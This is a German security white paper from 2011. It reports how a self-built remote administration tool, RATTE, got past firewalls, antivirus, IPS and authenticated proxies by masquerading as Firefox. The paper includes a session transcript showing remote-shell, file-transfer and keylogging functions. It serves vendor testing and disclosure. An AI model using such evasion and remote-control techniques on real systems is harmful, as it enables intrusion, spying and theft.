Deutsch - Werth IT
Transcription
Deutsch - Werth IT
White Paper: Breaking Enterprise Security Ein Unternehmen kann jede IT-Bedrohung mittles moderner IT-Sicherheits-Produkte stoppen, zumindest behaupten dies für gewöhnlich die Marketing- und Verkaufs- Abteilungen der Hersteller. Dieses White Paper präsentiert die Ergebnisse einer Testreihe diverse Sicherheitslösungen und zeigt dass diese selbst bei einer (verschachtelten Verteidigung in der Tiefe versagen.)??? In den Tests wurde folgendes Netzwerkschema verwendet: Das Zielsystem war ausgestattet mit einer lokalen Firewall- und Antvirus = Netzwerk-Firewall mit integrieten AV-Check, Protokoll-Check, Application-Check, Proxy und IPS->Internet->Firewall mit identischen Sicherheitsmerkmalen->Angriffssystem Zur Durchführung der Tests wurde das Programm "Remote Administration Toolkit Tommy Edition" kurz RATTE entwickelt. Dieses Tool nutzt diverse nicht-fortschrittliche Techniken zur Umgehung der vorhandenen Sicherheitsmaßnahmen. Mittels dieser Techniken konnte RATTE in den Tests lokale Firewalls (Windows, Outpost und Sophos Firewall wurden getestet), IDS/IPS (Snort), AV (Avira,Sophos,Fortinet,Antivir), Netzwerk-Firewalls (GenuGate, Fortigate) und Proxys mit Authentifiziernug (Squid) umgehen. Eine exemplarische Beispielskonfiguration einer lokalen Firewall wird im Screenshot 1 dargestellt: Unter “Sperren” sieht man deutlich, dass der Schutz der erlaubten Anwendungen auf “Maximal” eingestellt ist. Screenshot 2 zeigt den Mitschnitt einer typischen RATTE-Kommunikation, inklusive Umgehung der vorhandenen Sicherheitsmaßnahmen: Das Transkript einer RATTE-Sitzung sieht folgendermaßen aus und veranschaulicht, dass selbst eine Shell trotz der vorhandenen Sicherheitsmaßnahmen möglich ist: RATTE Server Menue 1) list clients 2) activate client 3) remove client 4) remove all clients 5) remove&delete Client 99) stop Server Choose: 1 Warte auf Mutex Clients: 0) ID:1 HTTP connection from XXX using Ratte 1.4.1 <SystemName>\\<UserName> on <SystemName> running Windows XP Service Pack 2 as Admin C:\Programme\Mozilla Firefox\firefox.exe Connected at Mon Feb 14 04:11:14 2011 RATTE Server Menue 1) list clients 2) activate client 3) remove client 4) remove all clients 5) remove&delete Client 99) stop Server Choose: 2 nr ? 0 send activation request, may take 10 seconds Client activated Session Menue 1) start Shell 2) get File from Client 3) send File to Client 4) get Keylog to ./keylog.txt 5) Change Shell User 6) List Processes 7) Kill Process 8) Client bits File Download 99) close Session Choose: 1 C:\Programme\Mozilla Firefox> dir dir Volume in Laufwerk C: hat keine Bezeichnung. Volumeseriennummer: XXXX Verzeichnis von C:\Programme\Mozilla Firefox 14.02.2011 14.02.2011 26.07.2010 26.07.2010 07.05.2009 10:11 <DIR> . 10:11 <DIR> .. 08:49 0 .autoreg 08:49 17.880 AccessibleMarshal.dll 07:42 1.138 active-update.xml <...zur besseren Lesbarkeit gekürzt...> 47 Datei(en) 21.044.897 Bytes 13 Verzeichnis(se), 2.069.327.872 Bytes frei C:\Programme\Mozilla Firefox> exit C:\Programme\Mozilla Firefox> Session Menue 1) start Shell 2) get File from Client 3) send File to Client 4) get Keylog to ./keylog.txt 5) Change Shell User 6) List Processes 7) Kill Process 8) Client bits File Download 99) close Session Choose: 99 RATTE Server Menue 1) list clients 2) activate client 3) remove client 4) remove all clients 5) remove&delete Client 99) stop Server Choose: 99 Removing Client an Position 0, may take up to 10 seconds Shutting down! Screenshot 3 zeigt das zugehörige Log der Kommunikation, sichtbar innerhalb der lokalen Firewall unter "erlaubter Datenverkehr": Das letzte Bild veranschaulicht sehr deutlich, dass die lokale Firewall sich täuschen lässt und RATTE für den Firefox Browser hält und entsprechend das Regelwerk für den Firefox auf den Datenverkehr anwendet. Als Beitrag zur Verbesserung der allgemeinen Wirkung von modernen Sicherheitsprodukten wird RATTE zusammen mit diesem White Paper veröffentlicht. Somit sind Hersteller und Kunden in der Lage, die vorhandenen Sicherheitslücken nachzustellen und die Sicherheit nachhaltig zu erhöhen. Zusätzlich wird ein Video veröffentlicht, dass RATTE in Aktion zeigt, wie es eine vom Bundesamt für Sicherheit in der Informationstechnik nach EAL 4+ zertifizierte GenuGate Firewall durchbricht. RATTE wird nur zu Schulungszwecken und ohne Quellcode veröffentlicht. Es darf nicht ohne schriftliche Einwilligung des Inhabers des Zielsystems benutzt werden! Fazit: Moderne Sicherheitslösungen sind zu stark abhängig von signaturbasierter Erkennung, sowie nicht in der Lage, Datenverkehr korrekt einzustufen, wenn dieser sich an die Protokoll-Standards wie beispielsweise HTTP hält. Somit ist ein zuverlässiger Schutz vor "personalisierten" Schadprogrammen nicht gewährleistet. http://www.genua.de/dateien/pi-genugate6.3-zertifiziert.pdf Pressemittelung zur Zertifizierung der GenuGate. http://www.fortinet.com/doc/solutionbrief/firewall_proxy_sol_brief.pdf , Pressemittelung zur Applikationprüfung in der FortiGate http://www.av-test.org/certifications?lang=de, AV-Test-Ergebnisse http://www.marko-rogge.de/ratte.html , Video zu RATTE http://www.secmaniac.com/ , Social Engineering Toolkit, enthält RATTE (demnächst) "Die Kunst der digitalen Verteidigung" : B.2 Entwicklung eines Sicherheitsprüfprogrammes B.2.1 Umsetzung von Ratle in C++ Kontakt zum Autor wird erbeten über Marko Rogge: mail@marko-rogge.de Thomas Werth, Februar 2011, V1.1